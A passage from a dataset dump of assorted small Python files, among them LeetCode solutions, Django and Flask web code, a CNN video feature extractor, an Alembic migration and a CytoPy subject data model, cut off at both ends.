print(\"Keyboard Interrupt\")\n","sub_path":"lzrobot/scripts/send_simple_goal.py","file_name":"send_simple_goal.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"472787028","text":"class Solution:\n def numUniqueEmails(self, emails):\n \"\"\"\n :type emails: List[str]\n :rtype: int\n \"\"\"\n \n checked = set()\n \n for email in emails:\n first, domain = email.split(\"@\")\n firstPrefix, firstSuffix = first.split(\"+\", 1)\n firstPrefix = firstPrefix.replace(\".\",\"\")\n \n cleanedEmail = f\"{firstPrefix}@{domain}\"\n checked.add(cleanedEmail)\n \n return len(checked)\n\n# 8 minutes","sub_path":"leetcode/unique-email-addresses.py","file_name":"unique-email-addresses.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"136888828","text":"from django.conf.urls import patterns, url\nfrom clientes import views\n\nurlpatterns = patterns('',\n url(r'^$', views.index, name='index'),\n url(r'^web$', views.web, name='web'), 
# WEB\n    url(r'^acesso$', views.webAcesso, name='webAcesso'), # WEB\n    url(r'^novo$', views.clienteNovo, name='clienteNovo'),\n    url(r'^consulta$', views.clienteConsulta, name='clienteConsulta'),\n    url(r'^adicionar$', views.clienteAdicionar, name='clienteAdicionar'),\n    url(r'^lista$', views.clienteLista, name='clienteLista'),\n    url(r'^(?P\\d+)$', views.clienteDados, name='clienteDados'),\n    url(r'^(?P\\d+)/enderecos/novo$', views.enderecoNovo, name='enderecoNovo'),\n    url(r'^(?P\\d+)/enderecos/adicionar$', views.enderecoAdicionar, name='enderecoAdicionar'),\n    url(r'^(?P\\d+)/enderecos/deletar/(?P\\d+)$', views.enderecoDeletar, name='enderecoDeletar'),\n)\n","sub_path":"Web/clientes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"45912630","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport threading\nimport cv2\nimport numpy as np\nimport yaml\nimport pickle\nimport pdb\nimport tqdm\n\nimport torch\nimport torch.nn as nn\nimport torchvision.models as models\nimport torchvision.transforms as transforms\nfrom torch.autograd import Variable\nfrom PIL import Image\n\n#https://github.com/lukemelas/EfficientNet-PyTorch\nfrom efficientnet_pytorch import EfficientNet\nmodel = EfficientNet.from_pretrained('efficientnet-b0')\nmodel._fc = nn.Identity()\nmodel.eval()\n\ntfms = transforms.Compose([transforms.Resize(224), transforms.ToTensor(),\n    transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),])\n\ndef get_features(model, tfms, image_pil):\n    #img = tfms(Image.open(image)).unsqueeze(0)\n    img = tfms(image_pil).unsqueeze(0)\n    model.eval()\n    with torch.no_grad():\n        features = model(img)\n    return features.numpy()\n\ndef get_cnn_features_from_video(downsampled_video_filename, video_name, keyframe_interval):\n    \"Receives filename of downsampled video and of output path for features. Extracts features in the given keyframe_interval. Saves features in pickled file.\"\n\n    images = get_keyframes(downsampled_video_filename,keyframe_interval)\n    data = []\n    counter = 0\n    for image in images:\n        image_cv = cv2.cvtColor(image,cv2.COLOR_BGR2RGB)\n        image_pil = Image.fromarray(image_cv)\n#        cv2.imwrite('frame.jpg', image)\n        features = get_features(model, tfms, image_pil)\n        data.append(features)\n    #print(downsampled_video_filename)\n    try:\n        data = np.array(data)\n    except:\n        #continue\n        pass\n    \n    #if data is not []:\n    pickle.dump(data, open(str('test/'+video_name+'.pkl'), 'wb'))\n\n    \ndef get_keyframes(downsampled_video_filename, keyframe_interval):\n    \"Generator function which returns the next keyframe.\"\n\n    # Create video capture object\n    video_cap = cv2.VideoCapture(downsampled_video_filename)\n    frame = 0\n    while True:\n        frame += 1\n        ret, img = video_cap.read()\n        if ret is False:\n            break\n        if frame % keyframe_interval == 0:\n            yield img\n    video_cap.release()\n\n\nif __name__ == '__main__':\n    if len(sys.argv) != 3:\n        print(\"Usage: {0} video_list config_file\".format(sys.argv[0]))\n        print(\"video_list -- file containing video names\")\n        print(\"config_file -- yaml filepath containing all parameters\")\n        exit(1)\n\n    all_video_names = sys.argv[1]\n    config_file = sys.argv[2]\n    my_params = yaml.load(open(config_file))\n\n    # Get parameters from config file\n    keyframe_interval = my_params.get('keyframe_interval')\n    #hessian_threshold = my_params.get('hessian_threshold')\n    cnn_features_folderpath = my_params.get('test_features')\n    downsampled_videos = my_params.get('downsampled_videos')\n\n    # Check if folder for CNN features exists\n    if not os.path.exists(cnn_features_folderpath):\n        os.mkdir(cnn_features_folderpath)\n\n    # Loop over all videos (training, val, testing)\n\n    fread = open(all_video_names, \"r\")\n    for line in tqdm.tqdm(fread.readlines()):\n        video_name = line.replace('\\n', '')\n        downsampled_video_filename = os.path.join(downsampled_videos, video_name + '.ds.mp4')\n\n        if not os.path.isfile(downsampled_video_filename):\n            continue\n\n        if os.path.isfile(str('test/'+video_name+'.pkl')):\n            #print('{} exists'.format(str('cnn/'+video_name+'.pkl')))\n            continue\n\n        # Get CNN features for one video\n        get_cnn_features_from_video(downsampled_video_filename,\n                                    video_name, keyframe_interval)\n","sub_path":"hw2_code/cnn_feat_extraction-test.py","file_name":"cnn_feat_extraction-test.py","file_ext":"py","file_size_in_byte":3653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"89966005","text":"from datahub.core.thread_pool import submit_to_thread_pool\nfrom datahub.search.bulk_sync import sync_objects\nfrom datahub.search.migrate_utils import delete_from_secondary_indices_callback\n\n\ndef _sync_object(es_model, db_model, pk):\n    read_indices, write_index = es_model.get_read_and_write_indices()\n\n    instance = db_model.objects.get(pk=pk)\n    sync_objects(\n        es_model,\n        [instance],\n        read_indices,\n        write_index,\n        post_batch_callback=delete_from_secondary_indices_callback,\n    )\n\n\ndef sync_object_async(search_model, db_model, pk):\n    \"\"\"\n    Syncs a single object to Elasticsearch asynchronously (using the thread pool).\n\n    This function is normally used by signal receivers to copy new or updated objects to\n    Elasticsearch.\n\n    This function is migration-safe – if a migration is in progress, the object is added to the\n    new index and then deleted from the old index.\n    \"\"\"\n    return submit_to_thread_pool(_sync_object, search_model, db_model, pk)\n","sub_path":"datahub/search/sync_async.py","file_name":"sync_async.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"381803116","text":"#!/usr/bin/python3\n#-*- coding: utf-8 -*-\n\ndef fibonacci():\n    n, n1, n2 = 0, 0, 1\n    for x in range(0, 30):\n        print(n, end = \" - \")\n        n = n2\n        n1, n2 = n2, n1 + n\n\nfibonacci()\n","sub_path":"fibonacci/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"191307140","text":"#https://leetcode.com/problems/implement-trie-prefix-tree/ Medium\n\nclass TrieNode:\n    # Trie node class\n    def __init__(self):\n        self.children = [None] * 26\n        # is End\n        self.isEnd = False\n\n\nclass Trie:\n    # Trie data structure class\n    def __init__(self):\n        self.root = self.getNode()\n\n    def getNode(self):\n        # Returns new trie node (initialized to NULL)\n        return TrieNode()\n\n    def _charToIndex(self, ch):\n        # return 0 -> 'a', 1->'b',2->'c'\n        return ord(ch) - ord('a')\n\n    def insert(self, key):\n        pCrawl = self.root\n        length = len(key)\n        for level in range(length):\n            index = self._charToIndex(key[level])\n\n            # if current character is not present\n            if not pCrawl.children[index]:\n                pCrawl.children[index] = self.getNode()\n            pCrawl = pCrawl.children[index]\n        # mark as last node as leaf\n        pCrawl.isEnd = True\n\n    # Time complexity for insert and search - O(string_length)\n    def search(self, key):\n        pCrawl = self.root\n        length = len(key)\n        for level in range(length):\n            index = self._charToIndex(key[level])\n            if not pCrawl.children[index]:\n                return False\n            pCrawl = pCrawl.children[index]\n        return pCrawl != None and pCrawl.isEnd\n\n    def startsWith(self, key):\n        pCrawl = self.root\n        length = len(key)\n        for level in range(length):\n            index = self._charToIndex(key[level])\n            if not pCrawl.children[index]:\n                return False\n            pCrawl = pCrawl.children[index]\n        return pCrawl != None\n","sub_path":"Tandon-LeetCode-Bootcamp/Week 2 Strings/implement-trie-prefix-tree.py","file_name":"implement-trie-prefix-tree.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"127832632","text":"# Function to print the matrix\ndef print_matrix(mat):\n    for i in range(len(mat)):\n        for j in range(len(mat)):\n            print(str(mat[i][j]), end=\" \")\n        print()\n\n# Function to transpose the matrix\ndef transpose_matrix(mat):\n    for i in range(len(mat)):\n        for j in range(i, len(mat)):\n            mat[i][j], mat[j][i] = mat[j][i], mat[i][j]\n\n# Function to rotate the matrix clock wise\ndef clock_wise_rotate(mat):\n    for i in range(len(mat)):\n        k = len(mat) - 1\n        aa = 1\n        for j in range(k):\n            if k >= 1:\n                mat[i][j], mat[i][k] = mat[i][k], mat[i][j]\n            k = k - aa\n            aa += 1\n\n\n# Main Function\nmat = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]\nprint(\"The array before rotation is \")\nprint_matrix(mat)\n\ntranspose_matrix(mat)\nclock_wise_rotate(mat)\n\nprint(\"\\nThe array after rotation is \")\nprint_matrix(mat)\n\n# mat 2\nmat2 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12], [13, 14, 15, 16]]\nprint(\"The array before rotation is \")\nprint_matrix(mat2)\n\ntranspose_matrix(mat2)\nclock_wise_rotate(mat2)\n\nprint(\"\\nThe array after rotation is 
\")\nprint_matrix(mat2)\n","sub_path":"Rotate_Matrix_90_Degree_Clock.py","file_name":"Rotate_Matrix_90_Degree_Clock.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"289888685","text":"from flask import (\n Blueprint, flash, g, redirect, render_template, request, url_for\n)\nfrom werkzeug.exceptions import abort\nfrom sqlalchemy import desc\n\n\n#from app.auth import login_required\n#from app.database import get_db\nfrom auth import login_required\n#from database import get_db\nfrom models import db, User, Post\n\n\nbp = Blueprint('post', __name__)\n\n@bp.route('/')\ndef index():\n \"\"\"\n db = get_db()\n posts = db.execute(\n 'SELECT p.id, title, body, created, author_id, username'\n ' FROM post p JOIN user u ON p.author_id = u.id'\n ' ORDER BY created DESC'\n ).fetchall()\n \"\"\"\n #print(\"check_author-: \", check_author)\n posts = Post.query.filter(Post.author_id == User.id).order_by(desc(Post.created))\n #print(\"posts-: \", posts)\n\n return render_template('post/index.html', posts=posts)\n\n@bp.route('/create', methods=('GET', 'POST'))\n@login_required\ndef create():\n if request.method == 'POST':\n title = request.form['title']\n body = request.form['body']\n error = None\n\n if not title:\n error = 'Title is required.'\n\n if error is not None:\n flash(error)\n else:\n \"\"\"\n db = get_db()\n db.execute(\n 'INSERT INTO post (title, body, author_id)'\n ' VALUES (?, ?, ?)',\n (title, body, g.user['id'])\n )\n db.commit()\n \"\"\"\n #print(\"g.user.id: \",g.user.id)\n #print(\"title: \", title)\n #print(\"body: \", body)\n _post = Post( g.user.id, title, body)\n db.session.add(_post)\n db.session.commit()\n\n return redirect(url_for('post.index'))\n\n return render_template('post/create.html')\n\ndef get_post(id, check_author=True):\n \"\"\"\n post = get_db().execute(\n 'SELECT p.id, title, body, created, author_id, username'\n ' FROM post p JOIN user u ON p.author_id = u.id'\n ' WHERE p.id = ?',\n (id,)\n ).fetchone()\n \"\"\"\n #print(\"id: \", id)\n post = Post.query.filter(Post.id == id).first()\n #print(\"post: \", post)\n #print(\"post.id: \", post.id)\n\n if post is None:\n abort(404, \"Post id {0} doesn't exist.\".format(id))\n\n print(\"check_author: \", check_author)\n print(\"post.id: \", post.id)\n print(\"g.user.id: \", g.user.id)\n\n \"\"\"\n if check_author and post.id != g.user.id:\n abort(403)\n \"\"\"\n \n return post\n\n@bp.route('//update', methods=('GET', 'POST'))\n@login_required\ndef update(id):\n post = get_post(id)\n\n if request.method == 'POST':\n title = request.form['title']\n body = request.form['body']\n error = None\n\n if not title:\n error = 'Title is required.'\n\n if error is not None:\n flash(error)\n else:\n \"\"\"\n db = get_db()\n db.execute(\n 'UPDATE post SET title = ?, body = ?'\n ' WHERE id = ?',\n (title, body, id)\n )\n db.commit()\n \"\"\"\n _post = Post.query.filter(Post.id == id).first()\n db.session.delete(_post)\n\n post = Post(g.user.id, title, body)\n db.session.add(post)\n db.session.commit()\n\n return redirect(url_for('post.index'))\n\n return render_template('post/update.html', post=post)\n\n@bp.route('//delete', methods=('POST',))\n@login_required\ndef delete(id):\n get_post(id)\n\n \"\"\"\n db = get_db()\n db.execute('DELETE FROM post WHERE id = ?', (id,))\n db.commit()\n \"\"\"\n post = Post.query.filter(Post.id == id).first()\n db.session.delete(post)\n db.session.commit()\n return 
redirect(url_for('post.index'))","sub_path":"insightmark/insightmark/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":3754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"143187786","text":"import functools\n\n#Q1\nprint(\"Q1\")\n\n# First input: the number of strings\nnumOfStr = input()\nnumOfStr = int(numOfStr)\n\nif numOfStr == 0:\n print (\"No string available\")\n\nelse:\n\n # Second input\n string1 = input().split(\",\")\n\n f = map(lambda str: list(str), string1)\n print(list(f))\n\n#Q2\nprint(\"Q2\")\n\ndef frequency(str):\n\n frequencydict = {} # frequency listing in python dictionary\n\n str = str.lower()\n\n for letter in list(str):\n\n if letter == \" \": continue\n\n if letter in frequencydict:\n frequencydict[letter] += 1\n else:\n frequencydict[letter] = 1\n\n return frequencydict\n\ntexts = []\n\n# Get Keyboard input and append it to texts\nwhile True:\n text = input()\n\n if text == \"\\end\":\n break\n\n texts.append(text)\n\nif len(texts) == 0: print (\"Error\")\nelse:\n\n for i in range(len(texts)):\n\n unordered_dict = frequency(texts[i])\n ordered_dict = {}\n\n # sort the dictionary by keys\n for key, value in sorted(unordered_dict.items()):\n\n ordered_dict[key] = value\n\n print(ordered_dict)\n\n#Q3\nprint(\"Q3\")\n\nlocs = []\n\nwhile True:\n\n x_y = input()\n if x_y == \"\\end\":\n break\n\n x_y = x_y.split(\",\")\n locs.append((float(x_y[0]),float(x_y[1])))\n\npoints = iter(locs)\n\ndef comp1(p1, p2):\n\n # First compare x point\n if p1[0] < p2[0]:\n return p1\n\n elif p1[0] > p2[0]:\n return p2\n\n else:\n # Compare y point\n if p1[1] < p2[1]:\n return p1\n elif p1[1] > p2[1]:\n return p2\n else:\n p2 # p1 and p2 is the same\n\nout = functools.reduce(comp1, points)\n\nprint (out)","sub_path":"Homework/hw07.py","file_name":"hw07.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"153967124","text":"#!/usr/bin.env/python\n# -*- coding: utf-8 -*-\n\"\"\"\nEach subject in your analysis (human, mouse, cell line etc) can be\nrepresented by a Subject document that can then be associated to\nspecimens in an Experiment. 
This Subject document is dynamic and can\nhouse any relating meta-data.\n\nProjects also house the subjects (represented by the Subject class;\nsee CytoPy.data.subject) of an analysis which can contain multiple\nmeta-data.\n\nCopyright 2020 Ross Burton\n\nPermission is hereby granted, free of charge, to any person\nobtaining a copy of this software and associated documentation\nfiles (the \"Software\"), to deal in the Software without restriction,\nincluding without limitation the rights to use, copy, modify,\nmerge, publish, distribute, sublicense, and/or sell copies of the\nSoftware, and to permit persons to whom the Software is furnished\nto do so, subject to the following conditions:\nThe above copyright notice and this permission notice shall be included\nin all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\nEXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\nMERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\nIN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY\nCLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,\nTORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE\nSOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\nfrom .fcs import FileGroup\nimport mongoengine\nimport numpy as np\n\n__author__ = \"Ross Burton\"\n__copyright__ = \"Copyright 2020, CytoPy\"\n__credits__ = [\"Ross Burton\", \"Simone Cuff\", \"Andreas Artemiou\", \"Matthias Eberl\"]\n__license__ = \"MIT\"\n__version__ = \"1.0.0\"\n__maintainer__ = \"Ross Burton\"\n__email__ = \"burtonrj@cardiff.ac.uk\"\n__status__ = \"Production\"\n\n\nclass MetaDataDictionary(mongoengine.Document):\n \"\"\"\n Model for a custom dictionary that can be used for given descriptions to meta-data.\n Helpful when exploring single cell data that has been associated to meta-data in the Explorer object;\n see flow.clustering.main.Explorer)\n\n Attributes\n -----------\n key: str\n name of meta-data (column name)\n desc: str\n string value of writen description\n \"\"\"\n key = mongoengine.StringField()\n desc = mongoengine.StringField()\n\n\nclass Drug(mongoengine.EmbeddedDocument):\n \"\"\"\n Document representation of drug administration. Single document instance represents one event.\n\n Attributes\n -----------\n name: str\n name of therapy/drug\n init_date: DateTime\n date that therapy/drug started\n end_data: DateTime\n date that therapy/drug ended\n \"\"\"\n name = mongoengine.StringField(required=True)\n init_date = mongoengine.DateTimeField(required=False)\n end_date = mongoengine.DateTimeField(required=False)\n dose = mongoengine.StringField(required=False)\n notes = mongoengine.StringField(required=False)\n\n\nclass Bug(mongoengine.EmbeddedDocument):\n \"\"\"\n Document representation of isolated pathogen. 
Single document instance represents one pathogen.\n\n Attributes\n -----------\n gram_status: str, optional\n value of organisms gram status, valid choices are ['P+ve', 'N-ve', 'Unknown']\n hmbpp_status: str, optional\n value of hmbpp status, valid choices are ['P+ve', 'N-ve', 'Unknown']\n ribo_status: str, optional\n value of organisms ribo status, valid choices are ['P+ve', 'N-ve', 'Unknown']\n org_name: str\n name of the organism\n id_method: str, optional\n method used to identify organism\n culture_source: str, optional\n site of isolated organism\n organism_type: str, optional\n type of organism isolated, valid choices are ['bacteria', 'fungi', 'virus']\n report_date: DateTime, optional\n date that organism was reported\n notes: str, optional\n string value for free text notes\n \"\"\"\n gram_status = mongoengine.StringField(required=False, choices=['P+ve', 'N-ve', 'Unknown'])\n hmbpp_status = mongoengine.StringField(required=False, choices=['P+ve', 'N-ve', 'Unknown'])\n ribo_status = mongoengine.StringField(required=False, choices=['P+ve', 'N-ve', 'Unknown'])\n org_name = mongoengine.StringField(required=False)\n short_name = mongoengine.StringField(required=False)\n id_method = mongoengine.StringField(required=False)\n culture_source = mongoengine.StringField(required=False)\n organism_type = mongoengine.StringField(required=False, choices=['bacteria', 'fungi', 'virus'])\n report_date = mongoengine.DateTimeField(required=False)\n growth_weight = mongoengine.StringField(required=False)\n notes = mongoengine.StringField(required=False)\n\n\nclass Biology(mongoengine.EmbeddedDocument):\n \"\"\"\n Document representation of biological test (blood pathology). Single document instance represents one test.\n\n Attributes\n -----------\n test_date: DateTime\n date that test was performed\n test: str\n name of pathology test\n result: float\n value of pathology test\n unit: str\n units reported\n ref_range: str\n reported reference range\n test_category: str\n category of test\n \"\"\"\n test_date = mongoengine.DateTimeField(required=False)\n test = mongoengine.StringField(required=False)\n result = mongoengine.FloatField(required=False)\n unit = mongoengine.StringField(required=False)\n ref_range = mongoengine.StringField(required=False)\n test_category = mongoengine.StringField(required=False)\n notes = mongoengine.StringField(required=False)\n\n\nclass Subject(mongoengine.DynamicDocument):\n \"\"\"\n Document based representation of subject meta-data.\n Subjects are stored in a dynamic document, meaning\n new properties can be added ad-hoc.\n\n Attributes\n -----------\n subject_id: str, required\n Unique identifier for subject\n files: ListField\n List of references to files associated to subject\n drug_data: EmbeddedDocListField\n Associated drug data\n infection_data: EmbeddedDocListField\n Associated infection data\n patient_biology: EmbeddedDocListField\n Associated biological data\n notes: str\n Additional notes\n \"\"\"\n subject_id = mongoengine.StringField(required=True, unique=True)\n\n # Associated FCS Files\n files = mongoengine.ListField(mongoengine.ReferenceField(FileGroup, reverse_delete_rule=mongoengine.PULL))\n\n # Embeddings\n drug_data = mongoengine.EmbeddedDocumentListField(Drug)\n infection_data = mongoengine.EmbeddedDocumentListField(Bug)\n patient_biology = mongoengine.EmbeddedDocumentListField(Biology)\n\n # Notes\n notes = mongoengine.StringField(required=False)\n\n meta = {\n 'db_alias': 'core',\n 'collection': 'subjects'\n }\n\n def delete(self, *args, 
**kwargs):\n \"\"\"\n Delete the Subject. The subject will automatically be pulled from associated Projects (reference field in\n Project model has reverse_delete_rile=4; see mongoengine API for info).\n\n WARNING: deletion of a subject will result in the automatic removal of all associated FCS data!\n\n Parameters\n ----------\n signal_kwargs: optional\n kwargs dictionary to be passed to the signal calls.\n write_concern\n Extra keyword arguments are passed down which will be used as options for the resultant getLastError command.\n For example, save(..., w: 2, fsync: True) will wait until at least two servers have recorded the write and\n will force an fsync on the primary server.\n\n Returns\n -------\n None\n \"\"\"\n for f in self.files:\n f.delete()\n super().delete(*args, **kwargs)\n\n\ndef gram_status(subject: Subject) -> str:\n \"\"\"\n Given an instance of Subject, return the gram status of isolated organisms.\n Where multiple organisms are found, if gram status differs amongst orgs, returns 'mixed'\n\n Parameters\n ----------\n subject: Subject\n\n Returns\n --------\n str\n String value for gram status\n \"\"\"\n if not subject.infection_data:\n return 'Unknown'\n orgs = [b.gram_status for b in subject.infection_data]\n if not orgs:\n return 'Unknown'\n if len(orgs) == 1:\n return orgs[0]\n return 'Mixed'\n\n\ndef bugs(subject: Subject, multi_org: str, short_name: bool = False) -> str:\n \"\"\"\n Fetch the name of isolated organisms for each patient.\n\n Parameters\n -----------\n subject: Subject\n short_name: bool\n If True, the shortened name rather than whole latin name is returned\n multi_org: str\n If 'multi_org' equals 'list' then multiple organisms will be stored as a comma separated list\n without duplicates, whereas if the value is 'mixed' then multiple organisms will result in a value of 'mixed'.\n\n Returns\n --------\n str\n string of isolated organisms comma separated, or 'mixed' if multi_org == 'mixed' and multiple organisms\n listed for patient\n \"\"\"\n if not subject.infection_data:\n return 'Unknown'\n if short_name:\n orgs = [b.short_name for b in subject.infection_data]\n else:\n orgs = [b.org_name for b in subject.infection_data]\n if not orgs:\n return 'Unknown'\n if len(orgs) == 1:\n return orgs[0]\n if multi_org == 'list':\n return ','.join(orgs)\n return 'mixed'\n\n\ndef org_type(subject: Subject) -> str:\n \"\"\"\n Parse all infectious isolates for each patient and return the organism type isolated, one of either:\n 'gram positive', 'gram negative', 'virus', 'mixed' or 'fungal'\n\n Parameters\n -----------\n subject: Subject\n\n Returns\n --------\n str\n common organism type isolated for patient\n \"\"\"\n\n def bug_type(b: Bug):\n if not b.organism_type:\n return 'Unknown'\n if b.organism_type == 'bacteria':\n return b.gram_status\n return b.organism_type\n\n bugs = list(set(map(bug_type, subject.infection_data)))\n if len(bugs) == 0:\n return 'Unknown'\n if len(bugs) == 1:\n return bugs[0]\n return 'mixed'\n\n\ndef hmbpp_ribo(subject: Subject, field: str) -> str:\n \"\"\"\n Given a value of either 'hmbpp' or 'ribo' for 'field' argument, return True if any Bug has a positive status\n for the given patient ID.\n\n Parameters\n -----------\n subject: Subject\n field: str\n field name to search for; expecting either 'hmbpp_status' or 'ribo_status'\n\n Returns\n --------\n str\n common value of hmbpp_status/ribo_status\n \"\"\"\n if all([b[field] is None for b in subject.infection_data]):\n return 'Unknown'\n if all([b[field] == 'P+ve' for b in 
subject.infection_data]):\n return 'P+ve'\n if all([b[field] == 'N-ve' for b in subject.infection_data]):\n return 'N-ve'\n return 'mixed'\n\n\ndef biology(subject_id: str, test_name: str, method: str) -> np.float or None:\n \"\"\"\n Given some test name, return a summary statistic of all results for a given patient ID\n\n Parameters\n -----------\n subject_id: str\n patient identifier\n test_name: str\n name of test to search for\n method: str\n summary statistic to use\n\n Returns\n --------\n Numpy.float or None\n Summary statistic (numpy float) or None if test does not exist\n \"\"\"\n if subject_id is None:\n return None\n tests = Subject.objects(patient_id=subject_id).get().patient_biology\n tests = [t.result for t in tests if t.test == test_name]\n if not tests:\n return None\n if method == 'max':\n return np.max(tests)\n if method == 'min':\n return np.min(tests)\n if method == 'median':\n return np.median(tests)\n return np.average(tests)\n\n","sub_path":"CytoPy/data/subject.py","file_name":"subject.py","file_ext":"py","file_size_in_byte":11838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"486005084","text":"import psycopg2, os, sys, datetime \n\nsys.path.append(os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), \"db\"))\nimport databaseBursts # pylint: disable=C0413, E0401\nsys.path.append(os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), \"categorisation\"))\nfrom burstProcessing import packetBurstification, burstPrediction # pylint: disable=C0413, E0401\n\npacketBurstification()\nburstPrediction()\n\nDB_MANAGER = databaseBursts.dbManager()\n\ngetAll = \"\"\" SELECT * FROM bursts ORDER BY id\"\"\"\nprint ( DB_MANAGER.execute(getAll, \"\"))\n\ngetAll = \"\"\" SELECT * FROM categories ORDER BY id\"\"\"\nprint ( DB_MANAGER.execute(getAll, \"\"))\n\ngetALL = \"\"\" SELECT MIN(time), MIN(mac), burst, MIN(categories.name) FROM packets JOIN bursts ON bursts.id = packets.burst JOIN categories ON categories.id = bursts.category GROUP BY burst ORDER BY burst\"\"\"\nresult = DB_MANAGER.execute(getALL, \"\")\n\nfor row in result:\n print(row)\n\n\n","sub_path":"tests/testCategorisation.py","file_name":"testCategorisation.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"377833162","text":"\"\"\"empty message\n\nRevision ID: 1b92db4fb0ce\nRevises: 8541b8cbe108\nCreate Date: 2020-04-13 21:55:38.198618\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '1b92db4fb0ce'\ndown_revision = '8541b8cbe108'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('posts',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('poster_email', sa.String(length=120), nullable=True),\n sa.Column('date_posted', sa.Date(), nullable=True),\n sa.Column('body', sa.Text(), nullable=True),\n sa.Column('title', sa.String(length=140), nullable=True),\n sa.Column('apply_here_email', sa.String(length=120), nullable=True),\n sa.Column('link_to_application_site', sa.String(length=100), nullable=True),\n sa.Column('job_location', sa.String(length=120), nullable=True),\n sa.Column('org_name', sa.String(length=120), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_posts_date_posted'), 'posts', ['date_posted'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_posts_date_posted'), table_name='posts')\n op.drop_table('posts')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/1b92db4fb0ce_.py","file_name":"1b92db4fb0ce_.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"490138684","text":"import numpy as np\nimport cv2\n\nbackground = np.zeros((500, 500, 4), dtype='uint8')\n# to create a black background .zeros((pt1,pt1,channels), dtype='8-bit signed integer')\n\nfont = cv2.FONT_HERSHEY_DUPLEX\n# define the font\n\ncv2.putText(background, \"RUDRA\", (50, 200), font, 4, (255, 255, 255), 3, cv2.LINE_8)\ncv2.putText(background, \"BARAD\", (50, 330), font, 4, (255, 255, 255), 3, cv2.LINE_8)\n# .putText(image, text, coordinates, font, color, thickness, line_tyoe)\n\ncv2.imshow('text', background)\n# .image(name of window, object to show)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"Shapes And Text/writing_text.py","file_name":"writing_text.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"60383549","text":"filename = 'people-file'\nENDDB = 'enddb.'\nENDREC = 'endrec.'\nRECSEP = '=>'\ndef storeDB(db, filename=filename):\n\tdbfile = open(filename,'w')\n\tif (dbfile == None):\n\t\tprint(\"Open database file failed!\")\n\tfor key in db:\n\t\tprint(key,file=dbfile)\n\t\tfor (name,value) in db[key].items():\n\t\t\tprint(name + RECSEP + repr(value),file=dbfile)\n\t\tprint(ENDREC,file=dbfile)\n\tprint(ENDDB,file=dbfile)\n\tdbfile.close()\n\nif __name__ == '__main__':\n\tfrom initdata import db\n\tstoreDB(db)\n","sub_path":"make_db_file.py","file_name":"make_db_file.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"344374279","text":"import os\r\nimport webapp2\r\nimport jinja2\r\nimport re\n\r\nfrom google.appengine.ext import db\r\n\r\ntemplate_dir = os.path.join(os.path.dirname(__file__), 'templates')\r\njinja_env = jinja2.Environment(loader = jinja2.FileSystemLoader(template_dir), autoescape = True)\r\n\nclass Handler(webapp2.RequestHandler):\r\n def write(self, *a, **kw):\r\n self.response.out.write(*a, **kw)\r\n \r\n def render_str(self, template, **params):\r\n t = jinja_env.get_template(template)\r\n return t.render(params)\r\n \r\n def render(self, template, **kw):\r\n self.write(self.render_str(template, **kw))\r\n\ndef 